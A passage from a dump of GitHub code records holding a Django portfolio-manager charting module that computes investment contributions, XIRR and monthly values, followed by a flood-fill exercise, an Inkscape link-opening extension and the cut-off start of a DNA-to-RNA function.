add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, 0, ssy_trans.amount)\n else:\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, 0, -1*ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, float(ssy_trans.amount)))\n else:\n if ssy_trans.entry_type == 'CR':\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, ssy_trans.amount, 0, ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, -1*float(ssy_trans.amount)))\n else:\n add_or_create(ssy_trans.trans_date.year, 'SSY', contrib, deduct, total, 0, -1*ssy_trans.amount, -1*ssy_trans.amount)\n cash_flows.append((ssy_trans.trans_date, float(ssy_trans.amount)))\n \n for espp_obj in Espp.objects.filter(goal=goal_id):\n add_or_create(espp_obj.purchase_date.year, 'ESPP', contrib, deduct, total, espp_obj.total_purchase_price, 0, 0)\n end_year = datetime.datetime.now().year\n for st in EsppSellTransactions.objects.filter(espp=espp_obj):\n add_or_create(st.trans_date.year, 'ESPP', contrib, deduct, total, 0, -1*st.trans_price, 0)\n cash_flows.append((st.trans_date, float(st.trans_price)))\n cash_flows.append((espp_obj.purchase_date, -1*float(espp_obj.total_purchase_price)))\n for i in range (espp_obj.purchase_date.year, end_year+1):\n year_end_value = 0\n end_date = datetime.datetime.now()\n if i != datetime.datetime.now().year:\n end_date = datetime.datetime.strptime(str(i)+'-12-31', '%Y-%m-%d').date()\n units = espp_obj.shares_purchased\n for st in EsppSellTransactions.objects.filter(espp=espp_obj, trans_date__lte=end_date):\n units -= st.units\n \n if units > 0:\n year_end_value_vals = get_historical_stock_price_based_on_symbol(espp_obj.symbol, espp_obj.exchange, end_date+relativedelta(days=-5), end_date)\n if year_end_value_vals:\n conv_rate = 1\n if espp_obj.exchange == 'NASDAQ' or espp_obj.exchange == 'NYSE':\n conv_val = get_conversion_rate('USD', 'INR', end_date)\n if conv_val:\n conv_rate = conv_val\n for k,v in year_end_value_vals.items():\n year_end_value = float(v)*float(conv_rate)*float(units)\n break\n print(f'espp year_end_value {i} {year_end_value}')\n\n add_or_create(i, 'ESPP', contrib, deduct, total, 0, 0, year_end_value)\n\n year_end_mf = dict()\n\n try:\n for folio_obj in Folio.objects.filter(goal=goal_id):\n for trans in MutualFundTransaction.objects.filter(folio=folio_obj):\n trans_yr = trans.trans_date.year\n \n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n if yr not in year_end_mf:\n year_end_mf[yr] = dict()\n if folio_obj.fund.code not in year_end_mf[yr]:\n year_end_mf[yr][folio_obj.fund.code] = 0\n if trans.trans_type == 'Buy' and not trans.switch_trans:\n add_or_create(trans.trans_date.year, 'MutualFunds',contrib, deduct, total,trans.trans_price,0,0)\n cash_flows.append((trans.trans_date, -1*float(trans.trans_price)))\n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n year_end_mf[yr][folio_obj.fund.code] = year_end_mf[yr][folio_obj.fund.code]+trans.units\n elif trans.trans_type == 'Sell' and not trans.switch_trans:\n add_or_create(trans.trans_date.year, 'MutualFunds',contrib, deduct, total,0, -1*trans.trans_price,0)\n cash_flows.append((trans.trans_date, float(trans.trans_price)))\n for yr in range(trans_yr,datetime.datetime.now().year+1,1):\n year_end_mf[yr][folio_obj.fund.code] = year_end_mf[yr][folio_obj.fund.code]-trans.units\n except Exception as ex:\n print(ex)\n print('year_end_mf', year_end_mf)\n for yr,_ in year_end_mf.items():\n print('yr',yr)\n yr_data = year_end_mf[yr]\n end_date = datetime.datetime.now()\n if yr != datetime.datetime.now().year:\n end_date = datetime.datetime.strptime(str(yr)+'-12-31', '%Y-%m-%d').date()\n print('yr_data', yr_data)\n for code,qty in yr_data.items():\n historical_mf_prices = get_historical_mf_nav(code, end_date+relativedelta(days=-5), end_date)\n if len(historical_mf_prices) > 0:\n print('historical_mf_prices',historical_mf_prices)\n for k,v in historical_mf_prices[0].items():\n add_or_create(yr, 'MutualFunds',contrib, deduct, total,0,0,v*qty)\n \n \n if len(contrib.keys()):\n for i in range (curr_yr, min(contrib.keys())-1, -1):\n print('i:', i)\n if i not in total:\n total[i] = dict()\n for j in range(i-1, min(contrib.keys())-1, -1):\n if j not in total:\n total[j] = dict()\n print('j:', j)\n total[i]['PPF'] = total[i].get('PPF', 0) + total[j].get('PPF', 0)\n total[i]['EPF'] = total[i].get('EPF', 0) + total[j].get('EPF', 0)\n total[i]['SSY'] = total[i].get('SSY', 0) + total[j].get('SSY', 0)\n '''\n \n contrib, deduct, total, latest_value, cash_flows = get_goal_yearly_contrib_v2(goal_id, expected_return)\n\n total_contribution = 0\n total_years = 0\n last_yr_contrib = 0\n if len(contrib.keys()):\n for yr in range(curr_yr, min(contrib.keys())-1, -1):\n total_years += 1\n if yr in contrib:\n for _,amt in contrib[yr].items():\n total_contribution += amt\n if yr == datetime.date.today().year -1:\n last_yr_contrib += amt\n if yr in deduct:\n for _,amt in deduct[yr].items():\n total_contribution += amt\n if yr == datetime.date.today().year -1:\n last_yr_contrib += amt\n \n '''\n if len(contrib.keys()):\n print('************** time for comparision ***************')\n print('Contribution:\"')\n for yr in range(curr_yr, min(contrib.keys())-1, -1):\n if yr in contrib:\n print(f'{yr}: {contrib[yr]} \\t {contrib2.get(yr,None)}')\n print('Deduction:\"')\n for yr in range(curr_yr, min(deduct.keys())-1, -1):\n if yr in deduct:\n print(f'{yr}: {deduct[yr]} \\t {deduct2.get(yr, None)}')\n print('Total:\"')\n for yr in range(curr_yr, min(total.keys())-1, -1):\n if yr in total:\n print(f'{yr}: {total[yr]} \\t {total2.get(yr, None)}')\n print('************** end of comparision ***************')\n '''\n\n #print('total @299', total)\n if total_contribution: \n avg_contrib = total_contribution/total_years\n '''\n latest_value = 0\n for k,v in total[curr_yr].items():\n latest_value += v\n cash_flows.append((datetime.date.today(), latest_value))\n \n cash_flows = sort_set(cash_flows)\n \n\n if round(latest_value, 2) == round(latest_value2, 2):\n print('same latest values')\n else:\n print('different latest values')\n print('cash flows', cash_flows)\n if cash_flows == cash_flows2:\n print('same cash flows')\n else:\n print('different cash flows')\n i = 0\n while True:\n if i < len(cash_flows):\n till = 5 if len(cash_flows) - i > 5 else len(cash_flows) - i\n print(cash_flows[i:i+till])\n print(cash_flows2[i:i+till])\n i += till\n print('')\n else:\n break\n '''\n #calc_avg_growth = (latest_value-total_contribution)/(total_contribution*total_years)\n calc_avg_growth = None\n try:\n calc_avg_growth = xirr(cash_flows, 0.1)\n if calc_avg_growth == 0:\n print(f'couldnt get valid xirr for cashflows {cash_flows}')\n except Exception as ex:\n print(f'Exception {ex} when finding XIRR')\n\n if expected_return:\n avg_growth = expected_return/100\n else:\n avg_growth = calc_avg_growth\n \n goal_obj = Goal.objects.get(id=goal_id)\n goal_end_date = goal_obj.start_date+relativedelta(months=goal_obj.time_period)\n print('*************')\n ret['goal_end_date'] = goal_end_date\n if calc_avg_growth:\n ret['avg_growth'] = int(calc_avg_growth*100)\n ret['latest_value'] = latest_value\n ret['total_contribution'] = total_contribution\n ret['avg_contrib'] = int(avg_contrib)\n ret['last_yr_contrib'] = int(last_yr_contrib)\n print(ret)\n print('*************')\n\n if curr_yr == goal_end_date.year:\n from fixed_deposit.fixed_deposit_helper import get_maturity_value_on_date\n ret['final_projection'] = get_maturity_value_on_date(latest_value, datetime.date.today(), float(avg_growth), goal_end_date)\n else:\n for yr in range(curr_yr+1, goal_end_date.year+1):\n contrib[yr] = dict()\n total[yr] = dict()\n deduct[yr] = dict()\n contrib[yr]['Projected'] = avg_contrib\n if 'Projected' in total[yr-1]:\n total[yr]['Projected'] = (float(total[yr-1]['Projected'])+float(avg_contrib))*(1+float(avg_growth))\n else:\n total[yr]['Projected'] = (float(latest_value)+float(avg_contrib))*(1+float(avg_growth))\n deduct[yr]['Projected'] = 0\n ret['final_projection'] = int(total[yr]['Projected'])\n\n print('contrib', contrib)\n print('deduct', deduct)\n print('total', total)\n colormap = {\n '401K': '#617688', \n 'EPF':'#f15664',\n 'ESPP':'#DC7633',\n 'FD':'#006f75',\n 'PPF':'#92993c',\n 'SSY':'#f9c5c6',\n 'RSU':'#AA12E8',\n 'Shares':'#e31219',\n 'MutualFunds':'#bfff00',\n 'Insurance':'#ede76d',\n 'Projected':'#cbcdd1',\n 'Gold':'#ffd700',\n 'Cash':BankAccountInterface.get_chart_color(),\n 'Crypto':CryptoInterface.get_chart_color()\n }\n data = dict()\n data['labels'] = list()\n data['datasets'] = list()\n for i in sorted (contrib.keys()):\n data['labels'].append(str(i))\n print('data at 294', data)\n\n alloted_types = dict()\n for k,v in contrib.items():\n for typ, val in v.items():\n alloted_types[typ] = None\n\n\n for val in alloted_types.keys():\n centry = dict()\n centry['label'] = val+' contribution'\n centry['type'] = 'bar'\n centry['stack'] = 'contribution'\n centry['backgroundColor'] = colormap[val]\n centry['data'] = list()\n for i in sorted (contrib.keys()):\n centry['data'].append(int(contrib[i].get(val,0)))\n data['datasets'].append(centry)\n\n dentry = dict()\n dentry['label'] = val+ ' deduction'\n dentry['type'] = 'bar'\n dentry['stack'] = 'deduction'\n dentry['backgroundColor'] = colormap[val]\n dentry['data'] = list()\n for i in sorted (contrib.keys()):\n dentry['data'].append(deduct[i].get(val,0))\n data['datasets'].append(dentry)\n\n tentry = dict()\n tentry['label'] = val + ' total'\n tentry['type'] = 'bar'\n tentry['stack'] = 'total'\n tentry['backgroundColor'] = colormap[val]\n tentry['data'] = list()\n for i in sorted (contrib.keys()):\n tentry['data'].append(int(total[i].get(val,0)))\n data['datasets'].append(tentry)\n\n return data, ret\n\n\ndef sort_set(cash_flows):\n ret = list()\n done = list()\n while len(done) < len(cash_flows):\n largest = None\n largest_num = 0\n for i, flow in enumerate(cash_flows):\n if not i in done:\n if not largest:\n largest = flow\n largest_num = i\n else:\n if largest[0] > flow[0]:\n largest = flow\n largest_num = i\n elif largest[0] == flow[0]:\n if largest[1] > flow[1]:\n largest = flow\n largest_num = i\n ret.append(largest)\n done.append(largest_num)\n return ret\n\ndef get_goal_target_for_user(user_id):\n goal_objs = Goal.objects.filter(user=user_id)\n target_amt = 0\n for goal_obj in goal_objs:\n target_amt += goal_obj.final_val\n return target_amt\n\ndef get_user_contributions(user_id):\n print(\"inside get_user_contributions\")\n try:\n user_obj = User.objects.get(id=user_id)\n contrib = dict()\n contrib['distrib_colors'] = list()\n contrib['distrib_vals'] = list()\n contrib['distrib_labels'] = list()\n contrib['target'] = int(get_goal_target_for_user(user_id))\n contrib['EPF'] = int(EpfInterface.get_amount_for_user(user_id))\n contrib['ESPP'] = int(EsppInterface.get_amount_for_user(user_id))\n contrib['FD'] = int(FdInterface.get_amount_for_user(user_id))\n contrib['PPF'] =int(PpfInterface.get_amount_for_user(user_id))\n contrib['SSY'] =int(SsyInterface.get_amount_for_user(user_id))\n contrib['RSU'] = int(RsuInterface.get_amount_for_user(user_id))\n contrib['Insurance'] = int(InsuranceInterface.get_amount_for_user(user_id))\n contrib['Shares'] = int(ShareInterface.get_amount_for_user(user_id))\n contrib['MutualFunds'] = int(MfInterface.get_amount_for_user(user_id))\n contrib['401K'] = int(R401KInterface.get_amount_for_user(user_id))\n contrib['Gold'] = int(GoldInterface.get_amount_for_user(user_id))\n contrib['Cash'] = int(BankAccountInterface.get_amount_for_user(user_id))\n contrib['Crypto'] = int(CryptoInterface.get_amount_for_user(user_id))\n contrib['equity'] = contrib['ESPP']+contrib['RSU']+contrib['Shares']+contrib['MutualFunds']+contrib['401K']+contrib['Insurance']\n contrib['debt'] = contrib['EPF'] + contrib['FD'] + contrib['PPF'] + contrib['SSY']\n contrib['total'] = contrib['equity'] + contrib['debt'] + contrib['Gold'] + contrib['Cash'] + contrib['Crypto']\n \n item_color_mapping = {\n 'EPF': '#f15664',\n 'ESPP': '#DC7633',\n 'FD': '#006f75',\n 'PPF':'#92993c',\n 'SSY':'#f9c5c6', \n 'RSU': '#AA12E8', \n 'Shares': '#e31219', \n 'MutualFunds': '#bfff00',\n '401K': '#617688',\n 'Insurance': '#ede76d',\n 'Gold': '#ffd700',\n 'Cash': BankAccountInterface.get_chart_color(),\n 'Crypto': CryptoInterface.get_chart_color()\n }\n for k,v in item_color_mapping.items():\n if contrib[k] > 0:\n contrib['distrib_vals'].append(contrib[k])\n contrib['distrib_colors'].append(v)\n contrib['distrib_labels'].append(k)\n\n print(\"contrib:\", contrib)\n return contrib\n except User.DoesNotExist:\n print(\"User with id \", user_id, \" does not exist\" )\n pass\n except Exception as ex:\n print(f\"Exception getting user contribution for user with id: {str(user_id)} {ex}\")\n\n# home chart view\ndef get_investment_data(start_date):\n data_start_date = start_date+ relativedelta(months=-1)\n\n epf_data = list()\n ppf_data = list()\n ssy_data = list()\n fd_data = list()\n espp_data = list()\n rsu_data = list()\n shares_data = list()\n mf_data = list()\n r401k_data = list()\n insurance_data = list()\n gold_data = list()\n cash_data = list()\n loan_data = list()\n crypto_data = list()\n total_data = list()\n\n total_epf = 0\n total_ppf = 0\n total_ssy = 0\n\n epf_reset_on_zero = False\n fd_reset_on_zero = False\n r401k_reset_on_zero = False\n ppf_reset_on_zero = False\n ssy_reset_on_zero = False\n espp_reset_on_zero = False\n rsu_reset_on_zero = False\n shares_reset_on_zero = False\n mf_reset_on_zero = False\n insurance_reset_on_zero = False\n crypto_reset_on_zero = False\n gold_reset_on_zero = False\n cash_reset_on_zero = False\n loan_reset_on_zero = False\n total_reset_on_zero = False\n\n share_qty = dict()\n mf_qty = dict()\n today = datetime.date.today()\n data_end_date = data_start_date\n while True:\n if data_end_date == today:\n break\n\n print('Calculating for the month', data_start_date)\n total = 0\n data_end_date = data_start_date + relativedelta(months=+1)\n if data_end_date > today:\n data_end_date = today\n\n epf_entries = EpfEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for epf_entry in epf_entries:\n total_epf += int(epf_entry.employee_contribution) + int(epf_entry.employer_contribution) + int(epf_entry.interest_contribution) - int(epf_entry.withdrawl)\n if total_epf != 0:\n if not epf_reset_on_zero:\n epf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n epf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_epf})\n total += total_epf\n epf_reset_on_zero = True\n elif epf_reset_on_zero:\n epf_reset_on_zero = False\n epf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n ppf_entries = PpfEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for ppf_entry in ppf_entries:\n if ppf_entry.entry_type.lower() == 'cr' or ppf_entry.entry_type.lower() == 'credit':\n total_ppf += int(ppf_entry.amount)\n else:\n total_ppf -= int(ppf_entry.amount)\n if total_ppf != 0:\n if not ppf_reset_on_zero:\n ppf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n ppf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_ppf})\n total += total_ppf\n ppf_reset_on_zero = True\n elif ppf_reset_on_zero:\n ppf_reset_on_zero = False\n ppf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n ssy_entries = SsyEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for ssy_entry in ssy_entries:\n if ssy_entry.entry_type.lower() == 'cr' or ssy_entry.entry_type.lower() == 'credit':\n total_ssy += int(ssy_entry.amount)\n else:\n total_ssy -= int(ssy_entry.amount)\n if total_ssy != 0:\n if not ssy_reset_on_zero:\n ssy_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n ssy_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_ssy})\n total += total_ssy\n ssy_reset_on_zero = True\n elif ssy_reset_on_zero:\n ssy_reset_on_zero = False\n ssy_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n fd_entries = FixedDeposit.objects.filter(start_date__lte=data_start_date, mat_date__gte=data_end_date)\n fd_val = 0\n for fd in fd_entries:\n time_period = data_end_date-fd.start_date\n _, val = get_maturity_value(float(fd.principal), fd.start_date.strftime('%Y-%m-%d'), float(fd.roi), time_period.days)\n fd_val += val\n if fd_val != 0:\n if not fd_reset_on_zero:\n fd_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n fd_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':fd_val})\n total += fd_val\n fd_reset_on_zero = True\n elif fd_reset_on_zero:\n fd_reset_on_zero = False\n fd_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n r401k_val = get_r401k_value_as_on(data_end_date)\n if r401k_val != 0:\n if not r401k_reset_on_zero:\n r401k_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n r401k_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':r401k_val})\n total += r401k_val\n r401k_reset_on_zero = True\n elif r401k_reset_on_zero:\n r401k_reset_on_zero = False\n r401k_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n try:\n insurance_val = InsuranceInterface.get_value_as_on(data_end_date)\n if insurance_val != 0:\n if not insurance_reset_on_zero:\n insurance_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n insurance_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':insurance_val})\n total += insurance_val\n insurance_reset_on_zero = True\n elif insurance_reset_on_zero:\n insurance_reset_on_zero = False\n insurance_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for insurance as on {data_end_date}')\n \n try:\n crypto_val = CryptoInterface.get_value_as_on(data_end_date)\n if crypto_val != 0:\n if not crypto_reset_on_zero:\n crypto_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n crypto_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':crypto_val})\n total += crypto_val\n crypto_reset_on_zero = True\n elif crypto_reset_on_zero:\n crypto_reset_on_zero = False\n crypto_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for crypto as on {data_end_date}')\n\n try:\n gold_val = GoldInterface.get_value_as_on(data_end_date)\n if gold_val != 0:\n if not gold_reset_on_zero:\n gold_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n gold_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':gold_val})\n print(f'type of data: {type(total)} {type(gold_val)}')\n total += gold_val\n gold_reset_on_zero = True\n elif gold_reset_on_zero:\n gold_reset_on_zero = False\n gold_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for gold as on {data_end_date}')\n \n try:\n cash_val = BankAccountInterface.get_value_as_on(data_end_date)\n if cash_val != 0:\n if not cash_reset_on_zero:\n cash_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n cash_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':cash_val})\n print(f'type of data: {type(total)} {type(cash_val)}')\n total += cash_val\n cash_reset_on_zero = True\n elif cash_reset_on_zero:\n cash_reset_on_zero = False\n cash_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for cash as on {data_end_date}')\n\n espp_entries = Espp.objects.filter(purchase_date__lte=data_end_date)\n espp_val = 0\n for espp_entry in espp_entries:\n #print(\"espp entry\")\n avail_units = espp_entry.shares_purchased\n for sell_trans in EsppSellTransactions.objects.filter(espp=espp_entry, trans_date__lte=data_end_date):\n avail_units -= sell_trans.units\n\n if avail_units > 0:\n try:\n stock = Stock.objects.get(symbol=espp_entry.symbol, exchange=espp_entry.exchange)\n historical_stock_prices = get_historical_stock_price(stock, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if espp_entry.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n espp_val += float(conv_val)*float(v)*float(avail_units)\n found = True\n break\n else:\n espp_val += float(v)*float(avail_units)\n found = True\n break\n if found:\n break\n except Stock.DoesNotExist:\n pass\n if espp_val != 0:\n if not espp_reset_on_zero:\n espp_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n espp_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(espp_val)})\n total += espp_val\n espp_reset_on_zero = True\n elif espp_reset_on_zero:\n espp_reset_on_zero = False\n espp_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n rsu_entries = RestrictedStockUnits.objects.filter(vest_date__lte=data_end_date)\n rsu_val = 0\n for rsu_entry in rsu_entries:\n print(\"rsu entry\")\n su = 0\n for st in RSUSellTransactions.objects.filter(rsu_vest=rsu_entry, trans_date__lte=data_end_date):\n su += float(st.units)\n unsold_shares = float(rsu_entry.shares_for_sale) - su\n if unsold_shares > 0:\n try:\n stock = Stock.objects.get(symbol=rsu_entry.award.symbol, exchange=rsu_entry.award.exchange)\n historical_stock_prices = get_historical_stock_price(stock, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if stock.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n rsu_val += float(conv_val)*float(v)*unsold_shares\n found = True\n break\n else:\n rsu_val += float(v)*unsold_shares\n found = True\n break\n if found:\n break\n except Stock.DoesNotExist:\n pass\n if rsu_val != 0:\n if not rsu_reset_on_zero:\n rsu_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n rsu_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(rsu_val)})\n total += rsu_val\n rsu_reset_on_zero = True\n elif rsu_reset_on_zero:\n rsu_reset_on_zero = False\n rsu_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n share_transactions = Transactions.objects.filter(trans_date__range=(data_start_date, data_end_date))\n for trans in share_transactions:\n uni_name = trans.share.exchange+'-'+trans.share.symbol\n if uni_name not in share_qty:\n share_qty[uni_name] = 0\n if trans.trans_type == 'Buy':\n share_qty[uni_name] += trans.quantity\n else:\n share_qty[uni_name] -= trans.quantity\n if len(share_transactions) == 0:\n print(f'no transactions in shares in date range {data_start_date} and {data_end_date}')\n share_val = 0\n for s,q in share_qty.items():\n exchange = s[0:s.find('-')]\n symbol = s[s.find('-')+1:]\n stock_obj = add_common_stock(exchange=exchange, symbol=symbol, start_date=data_end_date)\n if stock_obj:\n if float(q) > 0:\n historical_stock_prices = get_historical_stock_price(stock_obj, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if stock_obj.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n share_val += float(conv_val)*float(v)*float(q)\n found = True\n break\n else:\n share_val += float(v)*float(q)\n found = True\n break\n if found:\n break\n else:\n print(f'{exchange} {symbol} quantity 0 by {data_end_date}')\n else:\n print(f'couldnt create stock object {s}')\n if share_val != 0:\n print(f'share value is not zero {share_val}')\n if not shares_reset_on_zero:\n shares_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n shares_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(share_val)})\n total += share_val\n shares_reset_on_zero = True\n elif shares_reset_on_zero:\n shares_reset_on_zero = False\n shares_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n folio_transactions = MutualFundTransaction.objects.filter(trans_date__range=(data_start_date, data_end_date))\n for trans in folio_transactions:\n uni_name = trans.folio.fund.code\n if uni_name not in mf_qty:\n mf_qty[uni_name] = 0\n if trans.trans_type == 'Buy':\n mf_qty[uni_name] += trans.units\n else:\n mf_qty[uni_name] -= trans.units\n mf_val = 0\n for s,q in mf_qty.items():\n fund_obj = MutualFund.objects.get(code=s)\n if fund_obj:\n if float(q) > 0:\n historical_mf_prices = get_historical_mf_nav(s, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_mf_prices:\n found = False\n for k,v in val.items():\n mf_val += float(v)*float(q)\n found = True\n break\n if found:\n break\n else:\n print(f'{s} quantity 0 by {data_end_date}')\n if mf_val != 0:\n if not mf_reset_on_zero:\n mf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n mf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(mf_val)})\n total += mf_val\n mf_reset_on_zero = True\n elif mf_reset_on_zero:\n mf_reset_on_zero = False\n mf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n try:\n loan_val = BankAccountInterface.get_loan_value_as_on(data_end_date)\n if loan_val != 0:\n if not loan_reset_on_zero:\n loan_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n loan_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':loan_val})\n total += loan_val\n loan_reset_on_zero = True\n elif loan_reset_on_zero:\n loan_reset_on_zero = False\n loan_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for loan as on {data_end_date}')\n\n if total != 0:\n if not total_reset_on_zero:\n total_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n total_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(total)})\n total_reset_on_zero = True\n elif total_reset_on_zero:\n total_reset_on_zero = False\n total_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n data_start_date = data_start_date+relativedelta(months=+1)\n print('shares data is:',shares_data)\n\n rv = {\n 'gold':gold_data, \n 'ppf':ppf_data, \n 'insurance':insurance_data, \n '401K': r401k_data, \n 'epf':epf_data, \n 'ssy':ssy_data, \n 'fd': fd_data, \n 'espp': espp_data, \n 'rsu':rsu_data, \n 'shares':shares_data, \n 'mf':mf_data,\n 'cash': cash_data,\n 'loan': loan_data,\n 'crypto': crypto_data,\n 'total':total_data\n }\n \n print(f'returning {rv}')\n return rv\n","repo_name":"krishnakuruvadi/portfoliomanager","sub_path":"src/shared/handle_chart_data.py","file_name":"handle_chart_data.py","file_ext":"py","file_size_in_byte":52907,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"27473003990","text":"\r\nclass Solution:\r\n def floodFill(self, image, sr: int, sc: int, newColor: int) :\r\n\r\n if 0 <= sr < len(image) and 0 <= sc < len(image[0]) :\r\n oldColor = image[sr][sc]\r\n if oldColor == newColor :\r\n return image\r\n image[sr][sc] = newColor\r\n if 0 <= sr+1 < len(image) and 0 <= sc < len(image[0]) and image[sr+1][sc] == oldColor:\r\n self.floodFill(image, sr+1, sc, newColor) #bottom\r\n if 0 <= sr-1 < len(image) and 0 <= sc < len(image[0]) and image[sr-1][sc] == oldColor:\r\n self.floodFill(image, sr-1, sc, newColor) #up\r\n if 0 <= sr < len(image) and 0 <= sc-1 < len(image[0]) and image[sr][sc-1] == oldColor:\r\n self.floodFill(image, sr, sc-1, newColor) #left\r\n if 0 <= sr < len(image) and 0 <= sc+1 < len(image[0]) and image[sr][sc+1] == oldColor:\r\n self.floodFill(image, sr, sc+1, newColor) #right\r\n\r\n return image\r\n\r\n def inImage(self, image, sr, sc) :\r\n return 0 <= sr < len(image) and 0 <= sc < len(image[0])\r\n \r\n def isOldClr(self, image, sr, sc, oldColor) :\r\n return image[sr][sc] == oldColor\r\n\r\ns = Solution()\r\nprint(s.floodFill([[0,0,0],[0,1,1]], 1, 1, 1))\r\n\r\n","repo_name":"TejasviniK/LeetCode","sub_path":"FloodFill.py","file_name":"FloodFill.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37056021458","text":"#!/usr/bin/env python\n\nimport threading\nimport webbrowser\n\nimport inkex\n\nclass VisitWebSiteWithoutLockingInkscape(threading.Thread):\n def __init__(self, url):\n threading.Thread.__init__ (self)\n self.url = url\n\n def run(self):\n webbrowser.open(self.url)\n\nclass FollowLink(inkex.Effect):\n def __init__(self):\n inkex.Effect.__init__(self)\n\n def effect(self):\n if (self.options.ids):\n for id, node in self.selected.iteritems():\n if node.tag == inkex.addNS('a','svg'):\n self.url = node.get(inkex.addNS('href','xlink'))\n vwswli = VisitWebSiteWithoutLockingInkscape(self.url)\n vwswli.start()\n #inkex.errormsg(\"Link: %s\" % self.url)\n break\n\n\nif __name__ == '__main__':\n e = FollowLink()\n e.affect(output=False)\n\n# vim: expandtab shiftwidth=4 tabstop=8 softtabstop=4 fileencoding=utf-8 textwidth=99\n","repo_name":"valerioa/Inkscape-MacOS-Curated-Build","sub_path":"share/extensions/inkscape_follow_link.py","file_name":"inkscape_follow_link.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"68"} +{"seq_id":"40730338119","text":"def to_rna(dna):\r\n\trna_dict={'A': 'U' , 'C': 'G' , 'G': 'C' , 'T': 'A' }\r\n\tlist1=list2=[]\r\n\tfor i in dna:\r\n\t\tlist1.append(i)\r\n\r\n\tfor i in list1:\r\n\r\n\t\tif i in rna_dict.keys():\r\n\t\t\tlist2.append(rna_dict[i])\r\n\r\n\t\telse:\r\n\t\t\tlist2.append(i)\r\n\r\n\trna=''.join(list2)\t\t\r\n\r\n\t\r\n\treturn 